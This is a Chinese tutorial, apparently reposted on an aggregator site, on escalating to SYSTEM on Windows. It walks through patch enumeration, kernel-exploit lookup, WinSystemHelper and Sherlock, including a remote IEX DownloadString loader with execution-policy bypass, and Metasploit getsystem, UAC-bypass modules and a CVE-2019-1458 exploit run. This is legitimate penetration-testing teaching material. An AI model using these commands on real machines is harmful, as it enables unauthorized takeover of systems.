Windows提权流程及手法

这篇具有很好参考价值的文章主要介绍了Windows提权流程及手法。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、信息收集

收集本机systeminfo中补丁信息

在提权辅助平台 https://i.hacking8.com/tiquan/ 中查询可利用exp

提权脚本,Penetration Testing,权限提升

查询exp,选择对应的Exp下载运行

https://i.hacking8.com/
https://github.com/SecWiki/windows-kernel-exploits

提权Exp的运行方式,一般有以下几种:

1、直接执行exe程序,成功后会打开一个cmd窗口,在新窗口中权限就是system
2、在WebShell中执行exe程序,执行方式为xxx.exe whoami,成功后直接执行命令,再修改命令内容,可以执行不同的命令
3、利用MSF等工具
4、C++源码,Python脚本,PowerShell脚本等特殊方式

二、WinSystemHelper

使用WinSystemHelper检查可利用的漏洞。该工具适合在任何Windows服务器上进行已知提权漏洞的检测

https://github.com/brianwrf/WinSystemHelper
图片

上传WinSysHelper.bat、explt2003.txt、expgt2003.txt,运行bat查看结果

然后在可利用的Exp中任意下载一个并执行即可

三、Sherlock

Sherlock是在Windows下用于本地提权的PowerShell脚本
分析漏洞出漏洞后利用对应Exp即可

https://github.com/rasta-mouse/Sherlock
图片

启动Powershell
$ powershell.exe -exec bypass

本地加载脚本
$ Import-Module Sherlock.ps1

远程加载脚本
$ IEX (New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1’)

检查漏洞,Vulnstatus为Appears Vulnerable即存在漏洞
$ Find-AllVulns

四、MSF提权

Getsystem
meterpreter> getsystem

BypassUAC

use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
use windows/local/bypassuac_vbs
use windows/local/ask
meterpreter> background  # 后台session 
msf> use exploit/windows/local/bypassuac
msf> set SESSION <session_id>  

后台session时会返回session_id,如不清楚可以使用命令sessions -l
msf> run

内核提权
查询补丁

meterpreter> run post/windows/gather/enum_patches 
[+] KB2999226 installed on 11/25/2020
[+] KB976902 installed on 11/21/2010

查询Exp

msf> use post/multi/recon/local_exploit_suggester 
msf> set LHOST <攻击机IP>
msf> set SESSION <session_id>
msf> run

利用示例文章来源地址https://www.toymoban.com/news/detail-717695.html

msf> use exploit/windows/local/cve_2019_1458_wizardopium 
msf> set SESSION <session_id>
msf> run
meterpreter> getuid
Server username: NT AUTHORITY\SYSTEM

五、参考链接

https://github.com/SecWiki/windows-kernel-exploits

https://github.com/brianwrf/WinSystemHelper

https://github.com/rasta-mouse/Sherlock

到了这里,关于Windows提权流程及手法的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC

    1、具体有哪些权限需要我们了解掌握的? 后台权限,网站权限,数据库权限,接口权限,系统权限,域控权限等 2、以上常见权限获取方法简要归类说明? 后台权限:SQL注入 , 数据库备份泄露,默认或弱口令等获取帐号密码进入 网站权限:后台提升至网站权限,RCE或文件操

    2024年02月10日
    浏览(28)
  • windows脚本获取管理员权限修改host

    很多时候我们常常需要通过管理员权限执行脚本,脚本可能涉及到一些受保护信息的访问,我们写个简单的脚本来更改host文件,host文件就是需要管理员权限才能访问的启动脚本时先检查是否有管理员权限,如果没有就调用授权脚本进行管理员授权打开,给用户弹出需要管理

    2024年02月14日
    浏览(39)
  • Windows 开机启动脚本 (不询问自动以管理员权限运行bat)

    获取开机启动文件夹 之后将“你的.bat”文件放入“开机启动文件夹”内即可 快捷键Win+R,zhixing shell:startup 打开用户级的开机自启文件夹 或者cmd执行: 之后将“你的.bat”文件放入“开机启动文件夹”内即可 相关参考: Windows设置程序开机自启动的几种方法(整理发布) 使用

    2024年02月13日
    浏览(47)
  • 操作系统权限提升(十九)之Linux提权-SUID提权

    系列文章 操作系统权限提升(十八)之Linux提权-内核提权 SUID是一种特殊权限,设置了suid的程序文件,在用户执行该程序时,用户的权限是该程序文件属主的权限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的权限。sgid与suid类似,只是执行程序时获

    2024年02月14日
    浏览(36)
  • 操作系统权限提升(十八)之Linux提权-内核提权

    内核提权是利用Linux内核的漏洞进行提权的,内核漏洞进行提权一般包括三个环节: 1、对目标系统进行信息收集,获取到系统内核信息及版本信息; 2、根据内核版本获取其对应的漏洞以及EXP 3、使用找到的EXP对目标系统发起攻击,完成提权操作 查看Linux操作系统的内核版本

    2024年01月16日
    浏览(42)
  • 权限提升:网站漏洞(提权思路.)

    权限提升简称 提权 ,由于 操作系统都是多用户操作系统 , 用户之间都有权限控制 ,比如通过 Web 漏洞拿到的是 Web 进程的权限,往往 Web 服务都是以一个权限很低的账号启动的,因此通过 Webshell 进行一些操作会受到限制,这就需要将其提升为管理甚至是 System 权限。通常通

    2024年02月05日
    浏览(32)
  • 权限提升:网站后台.(提权思路.)

    权限提升简称 提权 ,由于 操作系统都是多用户操作系统 , 用户之间都有权限控制 ,比如通过 Web 漏洞拿到的是 Web 进程的权限,往往 Web 服务都是以一个权限很低的账号启动的,因此通过 Webshell 进行一些操作会受到限制,这就需要将其提升为管理甚至是 System 权限。通常通

    2024年02月01日
    浏览(24)
  • 操作系统权限提升(十四)之绕过UAC提权-基于白名单AutoElevate绕过UAC提权

    系列文章 操作系统权限提升(十二)之绕过UAC提权-Windows UAC概述 操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权 注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!! 利用白名单程序的本质实际上是劫持注册表,这种方法主要是通过寻找autoElevated属性为

    2024年02月16日
    浏览(31)
  • 操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权

    系列文章 操作系统权限提升(十二)之绕过UAC提权-Windows UAC概述 注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!! 拿到一个普通管理员的SHELL,在CS中没有*号代表有UAC 执行添加用户的命令时显示拒绝访问 使用CS自带的插件进行绕过提权 直接提到了system权限

    2024年02月16日
    浏览(36)
  • Linux中特殊权限和提权详解

    sgid :  针对二进制的可执行文件,如果该文件有sgid的权限,那么当其他任何人来执行该文件时,则临时拥有文件拥有组的权限 针对目录: 如果一个目录有sgid权限,则在该目录下创建的的子目录可以继承该目录的权限,但是还是得根据umask值来继承,其他用户在该目录下创建子目录

    2024年01月25日
    浏览(36)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包